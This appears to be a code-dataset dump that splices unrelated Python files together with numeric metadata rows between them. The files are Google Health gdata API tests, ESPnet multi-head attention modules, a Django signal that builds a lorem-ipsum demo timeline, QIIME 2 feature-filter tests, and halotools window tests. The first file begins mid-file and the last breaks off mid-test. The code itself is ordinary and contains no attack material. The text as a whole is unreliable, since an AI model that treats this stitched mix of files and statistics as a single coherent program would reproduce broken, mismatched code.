self.assert_(feed.entry[0].ccr.GetMedications()[0] is not None)
self.assert_(feed.entry[0].ccr.GetConditions()[0] is not None)
self.assert_(feed.entry[0].ccr.GetAllergies() is None)
self.assert_(feed.entry[0].ccr.GetAlerts() is None)
self.assert_(feed.entry[0].ccr.GetResults() is None)
class H9QueryProfileTest(unittest.TestCase):
def setUp(self):
self.h9 = gdata.health.service.HealthService(use_h9_sandbox=True)
self.h9.ClientLogin(username, password, source='H9 Client Unit Tests')
self.profile_list_feed = self.h9.GetProfileListFeed()
self.profile_id = self.profile_list_feed.entry[0].GetProfileId()
def testGetProfileFeed(self):
feed = self.h9.GetProfileFeed(profile_id=self.profile_id)
self.assert_(isinstance(feed, gdata.health.ProfileFeed))
self.assert_(feed.entry[0].ccr is not None)
def testGetProfileFeedByQuery(self):
query = gdata.health.service.HealthProfileQuery(
service='h9', projection='ui', profile_id=self.profile_id)
feed = self.h9.GetProfileFeed(query=query)
self.assert_(isinstance(feed, gdata.health.ProfileFeed))
self.assert_(feed.entry[0].ccr is not None)
class HealthNoticeTest(unittest.TestCase):
def setUp(self):
self.health = gdata.health.service.HealthService()
self.health.ClientLogin(username, password, source='Health Client Unit Tests')
self.profile_list_feed = self.health.GetProfileListFeed()
self.profile_id = self.profile_list_feed.entry[0].GetProfileId()
def testSendNotice(self):
subject_line = 'subject line'
body = 'Notice <b>body</b>.'
ccr_xml = test_data.HEALTH_CCR_NOTICE_PAYLOAD
created_entry = self.health.SendNotice(subject_line,
body,
ccr=ccr_xml,
profile_id=self.profile_id)
self.assertEqual(created_entry.title.text, subject_line)
self.assertEqual(created_entry.content.text, body)
self.assertEqual(created_entry.content.type, 'html')
problem = created_entry.ccr.GetProblems()[0]
problem_desc = problem.FindChildren('Description')[0]
name = problem_desc.FindChildren('Text')[0]
self.assertEqual(name.text, 'Aortic valve disorders')
class H9NoticeTest(unittest.TestCase):
def setUp(self):
self.h9 = gdata.health.service.HealthService(use_h9_sandbox=True)
self.h9.ClientLogin(username, password, source='H9 Client Unit Tests')
self.profile_list_feed = self.h9.GetProfileListFeed()
self.profile_id = self.profile_list_feed.entry[0].GetProfileId()
def testSendNotice(self):
subject_line = 'subject line'
body = 'Notice <b>body</b>.'
ccr_xml = test_data.HEALTH_CCR_NOTICE_PAYLOAD
created_entry = self.h9.SendNotice(subject_line, body, ccr=ccr_xml,
profile_id=self.profile_id)
self.assertEqual(created_entry.title.text, subject_line)
self.assertEqual(created_entry.content.text, body)
self.assertEqual(created_entry.content.type, 'html')
problem = created_entry.ccr.GetProblems()[0]
problem_desc = problem.FindChildren('Description')[0]
name = problem_desc.FindChildren('Text')[0]
self.assertEqual(name.text, 'Aortic valve disorders')
if __name__ == '__main__':
print ('Health API Tests\nNOTE: Please run these tests only with a test '
'account. The tests may delete or update your data.')
username = input('Please enter your username: ')
password = getpass.getpass()
unittest.main()
| 41.346939
| 82
| 0.718534
| 1,001
| 8,104
| 5.677323
| 0.184815
| 0.054197
| 0.042231
| 0.053493
| 0.799226
| 0.792011
| 0.792011
| 0.790955
| 0.763505
| 0.749076
| 0
| 0.00904
| 0.167325
| 8,104
| 195
| 83
| 41.558974
| 0.833136
| 0.072433
| 0
| 0.708333
| 0
| 0
| 0.092642
| 0
| 0
| 0
| 0
| 0
| 0.256944
| 1
| 0.111111
| false
| 0.0625
| 0.034722
| 0
| 0.1875
| 0.006944
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
1370a0dcd2d3169f9ccd4544439c5891864f0f3d
| 8,692
|
py
|
Python
|
espnet/nets/pytorch_backend/transformer/attention.py
|
yowinzi/Compressive_Transformer
|
af525d8a5b3e08c083c4da59802a00c327fd8908
|
[
"Apache-2.0"
] | 1
|
2021-04-14T02:15:46.000Z
|
2021-04-14T02:15:46.000Z
|
espnet/nets/pytorch_backend/transformer/attention.py
|
NCTUMLlab/Chi-Hang-Leong-Online_Compressive_Transformer_for_Speech_Recognition
|
3f159ba9cf1ca9baabf0782d8acef4bb7332d8b9
|
[
"Apache-2.0"
] | null | null | null |
espnet/nets/pytorch_backend/transformer/attention.py
|
NCTUMLlab/Chi-Hang-Leong-Online_Compressive_Transformer_for_Speech_Recognition
|
3f159ba9cf1ca9baabf0782d8acef4bb7332d8b9
|
[
"Apache-2.0"
] | 2
|
2021-03-30T06:02:08.000Z
|
2021-08-06T06:59:22.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2019 Shigeki Karita
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""Multi-Head Attention layer definition."""
import math
import numpy
import torch
from torch import nn
class MultiHeadedAttention(nn.Module):
"""Multi-Head Attention layer.
:param int n_head: the number of heads
:param int n_feat: the number of features
:param float dropout_rate: dropout rate
"""
def __init__(self, n_head, n_feat, dropout_rate):
"""Construct an MultiHeadedAttention object."""
super(MultiHeadedAttention, self).__init__()
assert n_feat % n_head == 0
# We assume d_v always equals d_k
self.d_k = n_feat // n_head
self.h = n_head
self.linear_q = nn.Linear(n_feat, n_feat)
self.linear_k = nn.Linear(n_feat, n_feat)
self.linear_v = nn.Linear(n_feat, n_feat)
self.linear_out = nn.Linear(n_feat, n_feat)
self.attn = None
self.dropout = nn.Dropout(p=dropout_rate)
def forward(self, query, key, value, mask):
"""Compute 'Scaled Dot Product Attention'.
:param torch.Tensor query: (batch, time1, size)
:param torch.Tensor key: (batch, time2, size)
:param torch.Tensor value: (batch, time2, size)
:param torch.Tensor mask: (batch, time1, time2)
:param torch.nn.Dropout dropout:
:return torch.Tensor: attention-weighted and transformed `value` (batch, time1, d_model)
weighted by the query dot key attention (batch, head, time1, time2)
"""
if(len(query.shape)==3):
n_batch = query.size(0)
q = self.linear_q(query).view(n_batch, -1, self.h, self.d_k)
k = self.linear_k(key).view(n_batch, -1, self.h, self.d_k)
v = self.linear_v(value).view(n_batch, -1, self.h, self.d_k)
q = q.transpose(1, 2) # (batch, head, time1, d_k)
k = k.transpose(1, 2) # (batch, head, time2, d_k)
v = v.transpose(1, 2) # (batch, head, time2, d_k)
scores = torch.matmul(q, k.transpose(-2, -1)) / math.sqrt(
self.d_k
) # (batch, head, time1, time2)
if mask is not None:
mask = mask.unsqueeze(1).eq(0) # (batch, 1, time1, time2)
min_value = float(
numpy.finfo(torch.tensor(0, dtype=scores.dtype).numpy().dtype).min
)
scores = scores.masked_fill(mask, min_value)
self.attn = torch.softmax(scores, dim=-1).masked_fill(
mask, 0.0
) # (batch, head, time1, time2)
else:
self.attn = torch.softmax(scores, dim=-1) # (batch, head, time1, time2)
p_attn = self.dropout(self.attn)
x = torch.matmul(p_attn, v) # (batch, head, time1, d_k)
x = (
x.transpose(1, 2).contiguous().view(n_batch, -1, self.h * self.d_k)
) # (batch, time1, d_model)
else:
n_batch = query.size(0)
n_chunk = query.size(1)
q = self.linear_q(query).view(n_batch, n_chunk, -1, self.h, self.d_k)
k = self.linear_k(key).view(n_batch, n_chunk, -1, self.h, self.d_k)
v = self.linear_v(value).view(n_batch, n_chunk, -1, self.h, self.d_k)
q = q.transpose(2, 3) # (batch, chunk, head, time1, d_k)
k = k.transpose(2, 3) # (batch, chunk, head, time2, d_k)
v = v.transpose(2, 3) # (batch, chunk, head, time2, d_k)
scores = torch.matmul(q, k.transpose(-2, -1)) / math.sqrt(
self.d_k
) # (batch, chunk, head, time1, time2)
if mask is not None:
mask = mask.unsqueeze(2).eq(0) # (batch, chunk, 1, time1, time2)
min_value = float(
numpy.finfo(torch.tensor(0, dtype=scores.dtype).numpy().dtype).min
)
scores = scores.masked_fill(mask, min_value) #error
self.attn = torch.softmax(scores, dim=-1).masked_fill(
mask, 0.0
) # (batch, chunk, head, time1, time2)
else:
self.attn = torch.softmax(scores, dim=-1) # (batch, chunk, head, time1, time2)
p_attn = self.dropout(self.attn)
x = torch.matmul(p_attn, v) # (batch, chunk, head, time1, d_k)
x = (
x.transpose(2, 3).contiguous().view(n_batch, n_chunk, -1, self.h * self.d_k)
) # (batch, chunk, time1, d_model)
return self.linear_out(x) # (batch, time1, d_model)
def simple_attention(self,query,key,value):
n_batch = query.size(0)
q = torch.nn.functional.linear(query,self.linear_q.weight) #,self.linear_q.bias.detach()) don't use bias
k = torch.nn.functional.linear(key,self.linear_k.weight) #,self.linear_k.bias.detach())
v = torch.nn.functional.linear(value,self.linear_v.weight) #,self.linear_v.bias.detach())
scores = torch.matmul(q,k.transpose(-2,-1)) #/math.sqrt(self.d_k)
attn = torch.softmax(scores,dim=-1)
return torch.matmul(attn,v)
class MultiHeadedAttention4dim(nn.Module):
"""Multi-Head Attention layer.
:param int n_head: the number of heads
:param int n_feat: the number of features
:param float dropout_rate: dropout rate
"""
def __init__(self, n_head, n_feat, dropout_rate):
"""Construct an MultiHeadedAttention4dim object."""
super(MultiHeadedAttention4dim, self).__init__()
assert n_feat % n_head == 0
# We assume d_v always equals d_k
self.d_k = n_feat // n_head
self.h = n_head
self.linear_q = nn.Linear(n_feat, n_feat)
self.linear_k = nn.Linear(n_feat, n_feat)
self.linear_v = nn.Linear(n_feat, n_feat)
self.linear_out = nn.Linear(n_feat, n_feat)
self.attn = None
self.dropout = nn.Dropout(p=dropout_rate)
def forward(self, query, key, value, mask):
"""Compute 'Scaled Dot Product Attention'.
:param torch.Tensor query: (batch, chunk, time1, size)
:param torch.Tensor key: (batch, chunk, time2, size)
:param torch.Tensor value: (batch, chunk, time2, size)
:param torch.Tensor mask: (batch, chunk, time1, time2)
:param torch.nn.Dropout dropout:
:return torch.Tensor: attention-weighted and transformed `value` (batch, chunk, time1, d_model)
weighted by the query dot key attention (batch, chunk, head, time1, time2)
"""
n_batch = query.size(0)
n_chunk = query.size(1)
q = self.linear_q(query).view(n_batch, n_chunk, -1, self.h, self.d_k)
k = self.linear_k(key).view(n_batch, n_chunk, -1, self.h, self.d_k)
v = self.linear_v(value).view(n_batch, n_chunk, -1, self.h, self.d_k)
q = q.transpose(2, 3) # (batch, chunk, head, time1, d_k)
k = k.transpose(2, 3) # (batch, chunk, head, time2, d_k)
v = v.transpose(2, 3) # (batch, chunk, head, time2, d_k)
scores = torch.matmul(q, k.transpose(-2, -1)) / math.sqrt(
self.d_k
) # (batch, chunk, head, time1, time2)
if mask is not None:
mask = mask.unsqueeze(2).eq(0) # (batch, chunk, 1, time1, time2)
min_value = float(
numpy.finfo(torch.tensor(0, dtype=scores.dtype).numpy().dtype).min
)
scores = scores.masked_fill(mask, min_value) #error
self.attn = torch.softmax(scores, dim=-1).masked_fill(
mask, 0.0
) # (batch, chunk, head, time1, time2)
else:
self.attn = torch.softmax(scores, dim=-1) # (batch, chunk, head, time1, time2)
p_attn = self.dropout(self.attn)
x = torch.matmul(p_attn, v) # (batch, chunk, head, time1, d_k)
x = (
x.transpose(2, 3).contiguous().view(n_batch, n_chunk, -1, self.h * self.d_k)
) # (batch, chunk, time1, d_model)
return self.linear_out(x) # (batch, chunk, time1, d_model)
def simple_attention(self,query,key,value):
n_batch = query.size(0)
q = torch.nn.functional.linear(query,self.linear_q.weight) #,self.linear_q.bias.detach()) don't use bias
k = torch.nn.functional.linear(key,self.linear_k.weight) #,self.linear_k.bias.detach())
v = torch.nn.functional.linear(value,self.linear_v.weight) #,self.linear_v.bias.detach())
scores = torch.matmul(q,k.transpose(-2,-1)) #/math.sqrt(self.d_k)
attn = torch.softmax(scores,dim=-1)
return torch.matmul(attn,v)
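# Illustrative example, not part of the ESPnet module: exercising the 3-dimensional
# path of MultiHeadedAttention.forward with no mask. Shapes follow the docstring
# above; the tensor values are random placeholders.
import torch

mha = MultiHeadedAttention(n_head=4, n_feat=256, dropout_rate=0.1)
x = torch.randn(2, 50, 256)          # (batch, time1, size)
out = mha(x, x, x, mask=None)        # query = key = value -> self-attention
print(out.shape)                     # torch.Size([2, 50, 256])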
| 45.036269
| 112
| 0.577773
| 1,238
| 8,692
| 3.914378
| 0.099354
| 0.013619
| 0.023525
| 0.024763
| 0.917664
| 0.906934
| 0.903632
| 0.850805
| 0.838423
| 0.827074
| 0
| 0.024469
| 0.28532
| 8,692
| 192
| 113
| 45.270833
| 0.755634
| 0.304648
| 0
| 0.776923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015385
| 1
| 0.046154
| false
| 0
| 0.030769
| 0
| 0.123077
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b92017226259fea79a4605a4650174c5f269b257
| 4,347
|
py
|
Python
|
accounts/signals.py
|
raoulcapello/timelinor
|
eb162ad4e11452bcd180b3bf53866c8e3f35934d
|
[
"MIT"
] | null | null | null |
accounts/signals.py
|
raoulcapello/timelinor
|
eb162ad4e11452bcd180b3bf53866c8e3f35934d
|
[
"MIT"
] | 127
|
2021-08-18T10:18:27.000Z
|
2022-03-31T10:19:12.000Z
|
accounts/signals.py
|
raoulcapello/timelinor
|
eb162ad4e11452bcd180b3bf53866c8e3f35934d
|
[
"MIT"
] | null | null | null |
from django.db.models.signals import post_save
from django.contrib.auth import get_user_model
from timelines.models import Timeline, TimelineEvent
import datetime
User = get_user_model()
def my_first_timeline(sender, instance, created, **kwargs):
"""
Create a first, demo timeline for new users.
"""
if created:
# Create a timeline object
timeline = Timeline.objects.create(
user=instance,
title='My First Timeline',
description=(
'Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.'
),
)
# Create several events and place them on the newly created
# timeline
TimelineEvent.objects.create(
timeline=timeline,
title='2021',
subtitle='Web Developer',
description='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed.',
date=datetime.date(2021, 8, 1),
)
TimelineEvent.objects.create(
timeline=timeline,
title='2020',
subtitle='Web Designer',
description='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed.',
date=datetime.date(2020, 8, 1),
)
TimelineEvent.objects.create(
timeline=timeline,
title='2019',
subtitle='DevOps Engineer',
description='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed.',
date=datetime.date(2019, 8, 1),
)
TimelineEvent.objects.create(
timeline=timeline,
title='2018',
subtitle='Systems Engineer',
description='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed.',
date=datetime.date(2018, 8, 1),
)
TimelineEvent.objects.create(
timeline=timeline,
title='2017',
subtitle='Network Engineer',
description='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed.',
date=datetime.date(2017, 8, 1),
)
post_save.connect(my_first_timeline, sender=User)
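# Illustrative sketch, not part of signals.py: post_save.connect() above only runs
# when this module is imported, which Django projects usually arrange from
# AppConfig.ready(). The config below assumes an 'accounts' app and is shown only to
# illustrate that pattern; it is not copied from the project.
from django.apps import AppConfig

class AccountsConfig(AppConfig):
    default_auto_field = 'django.db.models.BigAutoField'
    name = 'accounts'

    def ready(self):
        from . import signals  # noqa: F401  (registers my_first_timeline)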
| 67.921875
| 518
| 0.715666
| 529
| 4,347
| 5.862004
| 0.175803
| 0.051596
| 0.077394
| 0.092873
| 0.806192
| 0.806192
| 0.791035
| 0.791035
| 0.72783
| 0.709126
| 0
| 0.014854
| 0.225673
| 4,347
| 63
| 519
| 69
| 0.906417
| 0.031516
| 0
| 0.3
| 0
| 0.12
| 0.640983
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02
| false
| 0
| 0.08
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b96a95333fce1219a58a721e5f154cf26475f370
| 8,201
|
py
|
Python
|
q2_feature_table/tests/filter/test_filter_features.py
|
cguccione/q2-feature-table
|
90b75bb4848371bd640fe7c4baf14bc448d597c9
|
[
"BSD-3-Clause"
] | null | null | null |
q2_feature_table/tests/filter/test_filter_features.py
|
cguccione/q2-feature-table
|
90b75bb4848371bd640fe7c4baf14bc448d597c9
|
[
"BSD-3-Clause"
] | null | null | null |
q2_feature_table/tests/filter/test_filter_features.py
|
cguccione/q2-feature-table
|
90b75bb4848371bd640fe7c4baf14bc448d597c9
|
[
"BSD-3-Clause"
] | null | null | null |
# ----------------------------------------------------------------------------
# Copyright (c) 2016-2022, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import unittest
import qiime2
import numpy as np
import pandas as pd
from biom.table import Table
from q2_feature_table import filter_features
class FilterFeaturesTests(unittest.TestCase):
""" These tests are minimal relative to FilterSamplesTests, since the
two functions being tested using the same private function under the
hood. These tests cover the two places where the axis parameter is
passed, to ensure that the tests work on the 'observation' axis as
well as the 'sample' axis.
"""
def test_min_frequency(self):
# no filtering
table = Table(np.array([[0, 1, 1], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
actual = filter_features(table, min_frequency=2)
expected = Table(np.array([[0, 1, 1], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
self.assertEqual(actual, expected)
# filter one
table = Table(np.array([[0, 1, 1], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
actual = filter_features(table, min_frequency=3)
expected = Table(np.array([[1, 1, 2]]),
['O2'],
['S1', 'S2', 'S3'])
self.assertEqual(actual, expected)
# filter all
table = Table(np.array([[0, 1, 1], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
actual = filter_features(table, min_frequency=5)
expected = Table(np.array([]), [], [])
self.assertEqual(actual, expected)
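# Behaviour exercised next (inferred from the expected tables): when filtering
# removes every feature, samples that become empty are normally dropped as well;
# passing filter_empty_samples=False keeps the (now empty) sample columns, which
# is why the expected result below is Table(np.empty((0, 3)), [], ['S1', 'S2', 'S3'])
# rather than a completely empty table.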
def test_filter_empty_samples(self):
# no filtering
table = Table(np.array([[0, 1, 1], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
actual = filter_features(table, min_frequency=2,
filter_empty_samples=False)
expected = Table(np.array([[0, 1, 1], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
self.assertEqual(actual, expected)
# filter all
table = Table(np.array([[0, 1, 1], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
actual = filter_features(table, min_frequency=5,
filter_empty_samples=False)
expected = Table(np.empty((0, 3)), [], ['S1', 'S2', 'S3'])
self.assertEqual(actual, expected)
def test_feature_metadata(self):
# no filtering
df = pd.DataFrame({'SequencedGenome': ['yes', 'yes']},
index=pd.Index(['O1', 'O2'], name='id'))
metadata = qiime2.Metadata(df)
table = Table(np.array([[0, 1, 3], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
actual = filter_features(table, metadata=metadata)
expected = Table(np.array([[0, 1, 3], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
self.assertEqual(actual, expected)
# filter one
df = pd.DataFrame({'SequencedGenome': ['yes']},
index=pd.Index(['O1'], name='id'))
metadata = qiime2.Metadata(df)
table = Table(np.array([[0, 1, 3], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
actual = filter_features(table, metadata=metadata)
expected = Table(np.array([[1, 3]]),
['O1'],
['S2', 'S3'])
self.assertEqual(actual, expected)
# filter all
df = pd.DataFrame({}, index=pd.Index(['foo'], name='id'))
metadata = qiime2.Metadata(df)
table = Table(np.array([[0, 1, 3], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
actual = filter_features(table, metadata=metadata)
expected = Table(np.array([]), [], [])
self.assertEqual(actual, expected)
# exclude one
df = pd.DataFrame({'SequencedGenome': ['yes']},
index=pd.Index(['O1'], name='id'))
metadata = qiime2.Metadata(df)
table = Table(np.array([[0, 1, 3], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
actual = filter_features(table, metadata=metadata,
exclude_ids=True)
expected = Table(np.array([[1, 1, 2]]),
['O2'],
['S1', 'S2', 'S3'])
self.assertEqual(actual, expected)
# exclude all
df = pd.DataFrame({'SequencedGenome': ['yes', 'yes']},
index=pd.Index(['O1', 'O2'], name='id'))
metadata = qiime2.Metadata(df)
table = Table(np.array([[0, 1, 3], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
actual = filter_features(table, metadata=metadata,
exclude_ids=True)
expected = Table(np.array([]), [], [])
self.assertEqual(actual, expected)
def test_where(self):
# no filtering
df = pd.DataFrame({'SequencedGenome': ['yes', 'no']},
index=pd.Index(['O1', 'O2'], name='feature-id'))
metadata = qiime2.Metadata(df)
table = Table(np.array([[0, 1, 3], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
where = "SequencedGenome='yes' OR SequencedGenome='no'"
actual = filter_features(table, metadata=metadata, where=where)
expected = Table(np.array([[0, 1, 3], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
self.assertEqual(actual, expected)
# filter one
df = pd.DataFrame({'SequencedGenome': ['yes', 'no']},
index=pd.Index(['O1', 'O2'], name='feature-id'))
metadata = qiime2.Metadata(df)
table = Table(np.array([[0, 1, 3], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
where = "SequencedGenome='yes'"
actual = filter_features(table, metadata=metadata, where=where)
expected = Table(np.array([[1, 3]]),
['O1'],
['S2', 'S3'])
self.assertEqual(actual, expected)
# filter all
df = pd.DataFrame({'SequencedGenome': ['yes', 'no']},
index=pd.Index(['O1', 'O2'], name='feature-id'))
metadata = qiime2.Metadata(df)
table = Table(np.array([[0, 1, 3], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
where = "SequencedGenome='yes' AND SequencedGenome='no'"
actual = filter_features(table, metadata=metadata, where=where)
expected = Table(np.array([]), [], [])
self.assertEqual(actual, expected)
# filter one -> exclude one
df = pd.DataFrame({'SequencedGenome': ['yes', 'no']},
index=pd.Index(['O1', 'O2'], name='feature-id'))
metadata = qiime2.Metadata(df)
table = Table(np.array([[0, 1, 3], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
where = "SequencedGenome='yes'"
actual = filter_features(table,
exclude_ids=True,
metadata=metadata,
where=where)
expected = Table(np.array([[1, 1, 2]]),
['O2'],
['S1', 'S2', 'S3'])
self.assertEqual(actual, expected)
if __name__ == "__main__":
unittest.main()
| 40.800995
| 78
| 0.444946
| 844
| 8,201
| 4.270142
| 0.132701
| 0.019423
| 0.0899
| 0.046615
| 0.81576
| 0.813818
| 0.808546
| 0.778024
| 0.753607
| 0.746393
| 0
| 0.052429
| 0.365077
| 8,201
| 200
| 79
| 41.005
| 0.639716
| 0.098768
| 0
| 0.828947
| 0
| 0
| 0.082162
| 0.011464
| 0
| 0
| 0
| 0
| 0.092105
| 1
| 0.026316
| false
| 0
| 0.039474
| 0
| 0.072368
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b9a23bb7e0690bd40e864d392e0d6e9d9dbb88f4
| 3,974
|
py
|
Python
|
halotools/empirical_models/abunmatch/tests/test_sample2_window_function.py
|
pllim/halotools
|
6499cff09e7e0f169e4f425ee265403f6be816e8
|
[
"BSD-3-Clause"
] | 83
|
2015-01-15T14:54:16.000Z
|
2021-12-09T11:28:02.000Z
|
halotools/empirical_models/abunmatch/tests/test_sample2_window_function.py
|
pllim/halotools
|
6499cff09e7e0f169e4f425ee265403f6be816e8
|
[
"BSD-3-Clause"
] | 579
|
2015-01-14T15:57:37.000Z
|
2022-01-13T18:58:44.000Z
|
halotools/empirical_models/abunmatch/tests/test_sample2_window_function.py
|
pllim/halotools
|
6499cff09e7e0f169e4f425ee265403f6be816e8
|
[
"BSD-3-Clause"
] | 70
|
2015-01-14T15:15:58.000Z
|
2021-12-22T18:18:31.000Z
|
""" Module testing the sample2_window_indices function that returns the
relevant CAM window to the naive python implementation.
"""
import numpy as np
from .naive_python_cam import sample2_window_indices
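# Behaviour under test (inferred from the assertions below): for a point
# x_sample1[ix1], sample2_window_indices returns a half-open slice
# (iy2_low, iy2_high) into x_sample2 of fixed length nwin, roughly centred on the
# matching rank in x_sample2 and clipped so it never runs past either end; e.g.
# ix1 near 0 always yields (0, nwin), ix1 near n1-1 yields (n2-nwin, n2), and when
# the two samples do not overlap the window saturates at the nearest edge.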
def test_left_edge_window():
""" Setup: x1 == x2. Enforce proper behavior at the leftmost edge.
"""
n1, n2 = 20, 20
x_sample1 = np.arange(n1)
x_sample2 = np.arange(n2)
nwin = 5
ix1 = 0
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
assert (init_iy2_low, init_iy2_high) == (0, nwin)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
ix1 = 1
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
assert (init_iy2_low, init_iy2_high) == (0, nwin)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
ix1 = 2
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
assert (init_iy2_low, init_iy2_high) == (0, nwin)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
ix1 = 3
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
assert (init_iy2_low, init_iy2_high) == (1, nwin+1)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
ix1 = 4
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
assert (init_iy2_low, init_iy2_high) == (2, nwin+2)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
def test_right_edge_window():
""" Setup: x1 == x2. Enforce proper behavior at the rightmost edge.
"""
n1, n2 = 20, 20
x_sample1 = np.arange(n1)
x_sample2 = np.arange(n2)
nwin = 5
ix1 = 19
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
assert (init_iy2_low, init_iy2_high) == (n2-nwin, n2)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
ix1 = 18
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
assert (init_iy2_low, init_iy2_high) == (n2-nwin, n2)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
ix1 = 17
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
assert (init_iy2_low, init_iy2_high) == (n2-nwin, n2)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
ix1 = 16
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
